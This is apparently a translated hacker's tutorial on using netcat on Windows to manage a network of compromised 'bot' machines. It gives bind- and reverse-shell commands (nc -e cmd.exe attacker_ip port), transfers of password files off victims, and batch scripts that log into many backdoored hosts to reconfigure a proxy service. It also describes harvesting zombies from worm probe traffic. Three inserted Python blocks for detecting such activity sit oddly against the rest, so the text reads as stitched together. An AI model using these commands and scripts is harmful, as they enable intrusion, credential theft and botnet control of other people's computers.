Nc.exe Advanced Skills Application Summary
Author: zhoutree
0. Preface
1. Netcat 1.10 for NT (nc11nt.zip), original English information
2. Netcat 1.10 for NT help information
3. Common Netcat 1.10 command formats
4. Manage bots and change zombie settings
5. Download links
6. Postscript
######################################################################
0. Preface
######################################################################
Recently my work has been relatively idle, and I have always wanted to telnet to bots automatically and execute commands, in order to manage my bots.
Writing a program myself is beyond my knowledge, so I only read the help information of nc; although I only half understood it,
with Kingsoft 2002 I still understood something.
I think it is necessary to summarize it again. Anyway, it mainly meets my own needs.
######################################################################
1. Netcat 1.10 for NT (nc11nt.zip)
######################################################################
Basic Features
 * Outbound or inbound connections, TCP or UDP, to or from any ports
 * Full DNS forward/reverse checking, with appropriate warnings
 * Ability to use any local source port
 * Ability to use any locally-configured network source address
 * Built-in port-scanning capabilities, with randomizer
 * Can read command line arguments from standard input
 * Slow-send mode, one line every N seconds
 * Hex dump of transmitted and received data
 * Ability to let another program service established connections
 * Telnet-options responder
New for NT
 * Ability to run in the background without a console window
 * Ability to restart as a single-threaded server to handle a new connection
________________________________________________________________________
Some of the features of netcat are:
Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Optional ability to let another program service inbound connections
Some of the potential uses of netcat:
Script backends
Scanning ports and inventorying services
Backup handlers
File transfers
Server testing and simulation
Firewall testing
Proxy gatewaying
Network performance testing
Address spoofing tests
Protecting X servers
1001 other uses you'll likely come up with
Netcat + Encryption = Cryptcat
Compared with Win2000's own telnet.exe and Microsoft's tlntsvr.exe service, we can see when connecting that:
1.1 nc.exe is a non-standard telnet client program;
1.2 there is also the putty.exe client program, which provides four connection modes:
    raw, telnet, rlogin and ssh.
######################################################################
2. Netcat 1.10 for NT help information
######################################################################
C:\WINDOWS\Desktop>nc -h
[v1.10 NT]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, background mode (background mode)
        -e prog         inbound program to exec [dangerous!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft (this help information)
        -i secs         delay interval for lines sent, ports scanned (delay time)
        -l              listen mode, for inbound connects (listen mode, waiting for a connection)
        -L              listen harder, re-listen on socket close (keeps listening after the connection is closed)
        -n              numeric-only IP addresses, no DNS (numeric IP mode, no DNS resolution)
        -o file         hex dump of traffic (hex dump to a file, three sections per line)
        -p port         local port number (local port)
        -r              randomize local and remote ports (random local and remote ports)
        -s addr         local source address (local source address)
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose] (-vv for more information)
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning] (scan mode, use with -vv)
port numbers can be individual or ranges: m-n [inclusive]
######################################################################
3. Common Netcat 1.10 command formats
######################################################################
The following draws on the article "sleep and don't wake up in the early morning of March October 15".
3.1 Port probing:
nc -vv ip port
THE RIVER [192.168.0.198] 19190 (?) open    // shows whether the port is open
3.2 Scanner
nc -vv -w 5 ip port-port
nc -vv -z ip port-port
This kind of scan leaves a lot of traces in the logs, and the system administrator will be on extra alert.
3.3 Backdoor
Victim machine:                  // the victim's machine
nc -l -p port -e cmd.exe         // win2000
nc -l -p port -e /bin/sh         // unix, linux
Attacker machine:                // the attacker's machine
nc victim_ip port                // connect to victim_ip and get a shell
3.4 Reverse connection
Attacker machine:    // usually combined with the sql2.exe remote overflow and webdavx3.exe attacks,
                     // or with a wollf reverse connection.
nc -vv -l -p port
Victim machine:
nc -e cmd.exe attacker_ip port
nc -e /bin/sh attacker_ip port
Or:
Attacker machine:
nc -vv -l -p port1    /* for input */
nc -vv -l -p port2    /* for display */
Victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2
Binding to port 139 with -s (nc.exe -L -p 139 -d -e cmd.exe -s <IP address of the other machine>):
this makes nc.exe take precedence over NetBIOS on that port.
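From the defender's side, the bind and reverse forms above (and the -L/-d/-s variant bound to port 139) are all visible in process-creation telemetry as nothing more than an nc command line. The following is an added example, not code from the article: a small Python classifier that parses nc 1.10 style command lines using the option table from the -h output and labels each invocation as a client, a plain listener, a bind shell (-e together with -l/-L) or a reverse shell (-e with a remote host). The sample events, PIDs and addresses are constructed for the demo.

```python
# Constructed sample process-creation events (pid, image, command line); these are
# made-up telemetry lines for the demo, not output from the original article.
SAMPLE_EVENTS = [
    (1204, "nc.exe", "nc -l -p 4444 -e cmd.exe"),
    (1310, "nc.exe", "nc.exe -L -p 139 -d -e cmd.exe -s 192.0.2.10"),
    (1422, "nc.exe", "nc -e cmd.exe 198.51.100.7 5555"),
    (1500, "nc.exe", "nc -vv -w 5 198.51.100.7 80"),
    (1601, "nc.exe", "nc -vv -l -p 1234"),
]

# nc 1.10 options that consume the following argument (from the -h output above)
FLAGS_WITH_ARG = {"-e", "-g", "-G", "-i", "-o", "-p", "-s", "-w"}


def parse_nc(cmdline):
    """Split an nc 1.10 style command line into (flags, positional args).

    Boolean flags may be clustered (-vv, -ld) and are counted; flags in
    FLAGS_WITH_ARG take the next token as their value.
    """
    argv = cmdline.split()
    flags, positional = {}, []
    i = 1  # argv[0] is the program name
    while i < len(argv):
        tok = argv[i]
        if tok in FLAGS_WITH_ARG:
            flags[tok] = argv[i + 1] if i + 1 < len(argv) else None
            i += 2
        elif tok.startswith("-") and len(tok) > 1:
            for ch in tok[1:]:
                flags["-" + ch] = flags.get("-" + ch, 0) + 1
            i += 1
        else:
            positional.append(tok)
            i += 1
    return flags, positional


def classify(cmdline):
    """Return (verdict, notes) describing what this nc invocation does."""
    flags, positional = parse_nc(cmdline)
    listening = "-l" in flags or "-L" in flags
    exec_prog = flags.get("-e")
    if exec_prog and listening:
        verdict = "bind-shell"       # an inbound connection is handed a program
    elif exec_prog:
        verdict = "reverse-shell"    # an outbound connection is handed a program
    elif listening:
        verdict = "listener"
    else:
        verdict = "client"
    notes = []
    if exec_prog:
        notes.append(f"executes {exec_prog}")
    if "-d" in flags:
        notes.append("detached from console (-d)")
    if "-L" in flags:
        notes.append("re-listens after close (-L)")
    if listening and flags.get("-p") == "139":
        notes.append("listening on NetBIOS port 139")
    if "-s" in flags:
        notes.append(f"source address pinned to {flags['-s']}")
    if not listening and positional:
        notes.append("remote target " + " ".join(positional))
    return verdict, notes


def triage(events):
    """Keep only the events an analyst must look at: anything that execs a program."""
    hits = []
    for pid, image, cmd in events:
        verdict = classify(cmd)[0]
        if verdict in ("bind-shell", "reverse-shell"):
            hits.append((pid, verdict))
    return hits


if __name__ == "__main__":
    for pid, image, cmd in SAMPLE_EVENTS:
        verdict, notes = classify(cmd)
        print(f"{pid:>5} {verdict:<13} {cmd}")
        for note in notes:
            print(f"      - {note}")
```

The parser is deliberately tolerant of the author's habit of writing `-p port` after the host name: the verdict depends only on the presence of -e and of -l/-L, so a slightly malformed command line is still classified the same way.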
3.5 Transfer files:
3.5.1 attacker machine <-- victim machine    // pull the password file back from the bot
nc -d -l -p port < path\filedest        /* attacker machine */ can be run from a shell
nc -vv attacker_ip port > path\file.txt  /* victim machine */ Ctrl+C to exit
// Run the command in cmd.exe on the GUI desktop (better still, install FTP after logging on to the terminal); otherwise Ctrl+C cannot be entered.
3.5.2 attacker machine --> victim machine    // upload the command file to the bot
nc -vv -l -p port > path\file.txt       /* victim machine */ Ctrl+C to exit
nc -d victim_ip port < path\filedest    /* attacker machine */ can be run from a shell
// This direction is better: when we log on to the terminal and move on to other bots, shell-mode logon can be chosen.
Conclusion: both ASCII and binary files can be transmitted, program files included.
Problem: after connecting to an IP address and completing the transfer, nc.exe does not exit on its own; the
connection is only torn down by killing the process with pskill.exe. But has the handle of the opened transfer file been released?
3.6 Port data packet capture.
nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a             # ecognized...
< 00000084 83 00 00 01 8f                                  # .....
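The -o dump above is often the only record of a session that is left behind, so it is worth being able to read it back mechanically. As an added example (not code from the article), the Python below parses the three-section format shown above (direction marker, 8-digit hex running offset, up to 16 hex bytes, then "#" and the printable rendering), rebuilds the received and sent byte streams separately, and reports any gap in the running offsets, which is how you notice that part of a capture is missing. The sample dump is constructed: the "<" lines mirror the excerpt above, the ">" line is made up.

```python
import re

# One nc -o dump line: direction marker, 8-hex-digit running offset, up to 16
# hex bytes, then "#" and the printable rendering of those bytes.
LINE_RE = re.compile(r"^\s*([<>])\s*([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}\s*)*)#")

# Constructed sample dump; "<" is data received, ">" is data sent.
SAMPLE_DUMP = """\
> 00000000 55 53 45 52 20 61 6e 6f 6e 79 6d 6f 75 73 0d 0a # USER anonymous..
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a             # ecognized...
"""


def parse_dump(text):
    """Parse nc -o output into a list of (direction, offset, data) records."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not an nc -o dump line: {line!r}")
        direction, offset = m.group(1), int(m.group(2), 16)
        data = bytes.fromhex(m.group(3))  # fromhex ignores the spacing
        records.append((direction, offset, data))
    return records


def reassemble(records):
    """Rebuild each direction's byte stream from its records.

    Returns ({"<": bytes, ">": bytes}, gaps) where gaps lists
    (direction, expected_offset, actual_offset) whenever two consecutive
    records of one direction are not contiguous.
    """
    streams = {"<": bytearray(), ">": bytearray()}
    next_offset = {}
    gaps = []
    for direction, offset, data in sorted(records, key=lambda r: (r[0], r[1])):
        if direction in next_offset and next_offset[direction] != offset:
            gaps.append((direction, next_offset[direction], offset))
        streams[direction] += data
        next_offset[direction] = offset + len(data)
    return {d: bytes(s) for d, s in streams.items()}, gaps


def printable(data):
    """Render bytes the way the dump's right-hand column does: '.' for non-printables."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in data)


if __name__ == "__main__":
    streams, gaps = reassemble(parse_dump(SAMPLE_DUMP))
    print("sent:    ", printable(streams[">"]))
    print("received:", printable(streams["<"]))
    print("gaps:    ", gaps)
```

Note that the first received record starts at offset 0x58, so everything before it was simply not in the excerpt; the gap check only flags holes between the records it is given, which is what you want when reading a dump that was cut at an arbitrary point.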
3.7 Telnet, automatic batch processing. ★★★★★ This is what I want to focus on.
nc victim_ip port < path\file.cmd        /* victim machine */ shows the execution process
nc -vv victim_ip port < path\file.cmd    /* victim machine */ shows the execution process, verbose
nc -d victim_ip port < path\file.cmd     quiet mode
_______________ file.cmd ________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
___________ file.cmd END ___________________
######################################################################
4. Manage bots and change zombie settings
######################################################################
4.1 Change the proxy port of the bot farm's snake.exe to 11111 (service name "sksockserver").
Uses the winshell backdoor, port 1234, with password.
The command format is
modi.bat youip.txt
___________ modi.bat ____________________________
@if "%1"=="" echo Error: no ip.txt & goto END
:start
@echo password> a.cmd
@echo s>> a.cmd
@echo cd /d %windir%\system32\>> a.cmd
@echo net stop "sksockserver">> a.cmd
@echo snake.exe -config port 11111>> a.cmd
@echo net start "sksockserver">> a.cmd
@echo exit>> a.cmd
:auto
@for /f "eol=; tokens=3" %%i in (%1) do @(nc.exe -vv %%i 1234 < a.cmd)
:END
___________ modi.bat END _______________________
4.2
@echo off
color f0
:start
cls
c:\nc -vv -w 3 -l -p 80 > 80.txt
goto start
After you turn off the firewall and run this batch file, a lot of Unicode-vulnerability probe traffic will be captured;
there are three groups, the Nimda virus scanning you. In this way zombies can be obtained, although their quality is not high.
But it is also a cheap method.
Bot characteristics:
1. Unicode vulnerability
2. Empty guest password, with guest in the administrators group
3. Other vulnerabilities
Take it slowly. I then tried forcing the upgrade again, but renaming tftp.exe afterwards was not recommended. Then use pskill to remove the mmc.exe process, followed by anti-virus. After the backdoor is finished, stop the guest account to deal with the dumb scanners.
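What the port-80 listener above actually collects in 80.txt is a stream of HTTP request lines from worm-infected hosts probing for the IIS Unicode and double-decode traversal bugs. The following is an added example, not code from the article: a Python classifier that canonicalises each request path the way the vulnerable decoder did (percent-decoding repeatedly and folding 2-byte overlong UTF-8 such as %c0%af and %c1%1c down to the ASCII separator they encode), then flags any request whose ".." segments climb above the web root. The sample request lines are constructed to resemble what lands in 80.txt and are not taken from the article; the decode-round counter distinguishes single-, double- and un-encoded probes.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample request lines, made up for this demo to resemble what the
# listener above would write into 80.txt (not lines from the original article).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /images/..%2f..%2fetc/passwd HTTP/1.1",
    "GET /images/logo.gif HTTP/1.1",
]


def fold_overlong(data):
    """Collapse 2-byte overlong UTF-8 (lead byte 0xC0/0xC1) to the ASCII byte it
    encodes, mirroring the lenient decode behind the IIS Unicode bug:
    c0 af -> '/', c1 1c -> '\\'. Every other byte passes through unchanged."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def canonical_path(path, max_rounds=3):
    """Percent-decode and fold overlong sequences until the path stops changing.
    Returns (canonical path with '/' separators, number of rounds that changed
    something); a count above 1 means the request was double-encoded."""
    cur, rounds = path.encode("utf-8"), 0
    for _ in range(max_rounds):
        nxt = fold_overlong(unquote_to_bytes(cur))
        if nxt == cur:
            break
        cur, rounds = nxt, rounds + 1
    return cur.decode("latin-1").replace("\\", "/"), rounds


def classify_request(line):
    """Decide whether one HTTP request line is a directory-traversal probe."""
    parts = line.split()
    if len(parts) < 2:
        return {"verdict": "malformed", "canonical": "", "decode_rounds": 0}
    target = parts[1].split("?", 1)[0]          # ignore the query string
    canon, rounds = canonical_path(target)
    depth, escapes = 0, False
    for seg in canon.split("/"):
        if seg == "..":
            depth -= 1
            escapes = escapes or depth < 0       # climbed above the web root
        elif seg and seg != ".":
            depth += 1
    verdict = "traversal-probe" if escapes else "benign"
    return {"verdict": verdict, "canonical": canon, "decode_rounds": rounds}


def summarize(lines):
    """Count probes vs. benign requests in a captured log."""
    counts = {"traversal-probe": 0, "benign": 0, "malformed": 0}
    for line in lines:
        counts[classify_request(line)["verdict"]] += 1
    return counts


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        r = classify_request(line)
        print(f"{r['verdict']:<15} rounds={r['decode_rounds']} {r['canonical']}")
    print(summarize(SAMPLE_REQUESTS))
```

Canonicalising before matching is the point: a signature that looks for the literal string "cmd.exe" misses nothing here, but a signature that looks for "../" without decoding misses every encoded variant, which is exactly the gap the original IIS checks had.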
######################################################################
5. Download links
######################################################################
5.1 http://www.atstake.com/research/tools/network_utilities/
Tool: Netcat 1.10 for Unix
Version: 03.000096
Platforms: * nix
Tool: Netcat 1.1 for Win 95/98/NT/2000
Version: 02.08.98
Platforms: Runs on Win 95/98/NT/2000
5.2 http://www.xfocus.net/download.php?id=320
Name: cryptcat_nt.zip    Updated:
Category: network tool    Platform: Win9x/NT/2000    Size: 115.8 K    Submitted by: maxilaw
Description: nc with encrypted transmission.
5.3 http://content.443.ch/pub/security/blackhat/Networking/nc/    (foreign site)
10.03.02    1305 cryptcat.txt
10.03.02  245760 cryptcat_linux2.tar
10.03.02  118533 cryptcat_nt.zip